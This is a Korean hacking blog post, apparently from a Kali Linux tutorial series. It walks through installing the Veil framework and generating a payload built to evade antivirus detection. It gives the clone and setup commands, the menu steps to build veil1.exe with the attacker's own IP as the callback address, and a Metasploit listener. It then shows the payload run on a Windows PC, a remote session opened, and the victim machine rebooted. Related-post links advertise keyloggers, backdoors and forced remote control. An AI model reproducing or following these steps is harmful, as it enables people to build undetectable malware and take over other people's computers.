메타스폴로잇으로 만든 악성코드는 백신프로그램에 탐지가 된다.
veil라는 악성코드 만드는 프로그램은 우회를 해서 백신에 걸리지 않는다.
Veil-Evasion, Veil-Ordnance,Veil-Catapult,PowerTools,Veil-Pillage
★Veil-Evasion
- 바이러스 백신을 우회해 악성코드를 제작
★Veil-Ordnance
- 엠파이어 와 비슷
- 실행하여 간단한 과정을 통해 인코딩된 쉘코드를 생성
★Veil-Catapult
- 피해자의 악성코드를 배달할때
- 침투된 대상 시스템에 페이로드를 전달하고 실행
★Veil-Pillage
- 원하는 기능의 모듈을 선택하여 다양한 형태의 페이로드를 제작할 수 있다. 또한 공격하는 과정에서 다른 공격용 도구로 대체하거나 소스코드를 수정하여 연동이 가능하기 때문에 더욱 강력한 도구
★PowerTools
- 공격형 도구들이 묶여있는 곳
Veil 설치
터미널창 git clone https://github.com/Veil-Framework/Veil.git
★Veil 다운하는게 많기도하고 칼리가 램이 부족해서인지 느려서 빠르게 만들어 볼거다.
터미널창
leafpad /etc/apt/sources.list 에 들어가서 밑에 소스 붙어넣기
deb http://kali.cs.nctu.edu.tw/kali kali-rolling main non-free contrib
setup 폴더에 들어가서 ./setup.sh -c 를 실행해 설치한다. 안하면 Veil이 작동을 안한다.
-c = clone veil framework repos
-u = update veil framework repos
설치를 다 완료한다.
Veil 파일에 ./Veil.py를 실행하고
main menu choice에 use Evasion 실행.
use 28 실행
set lhost (자신 아이피) 실행
generate 실행
rc파일 경로 저장한후 새터미널 msfconsole -r(경로) 파일 위치 실행
veil1.exe 가 백신우회된 악성코드다.
내가 만든 악성코드에 msfconsole로 접속한후 pc윈도우에서 veil1.exe 접속
메타스폴로잇으로 만든 악성코드 발견 감지
누가 들어왔는지 세션이 검색 되었다.
sessions -i 1
reboot 하면 상대 pc 재부팅.
'Hacking > Kali Linux' 카테고리의 다른 글
Kali/ 상대 pc 암호화된 파일 풀기(fcrackzip) (0) | 2017.06.25 |
---|---|
Kali/ 상대pc 원격제어,nmap (rdesktop) (0) | 2017.06.25 |
Kali/ 백도어 악성코드 만들기 (5가지 OS) (0) | 2017.06.17 |
Kali/ 로그인 해킹 (키로거,사이트 클론) (0) | 2017.06.16 |
Kali/ 상대방pc 강제 원격제어 cobaltstrike (1) | 2017.06.14 |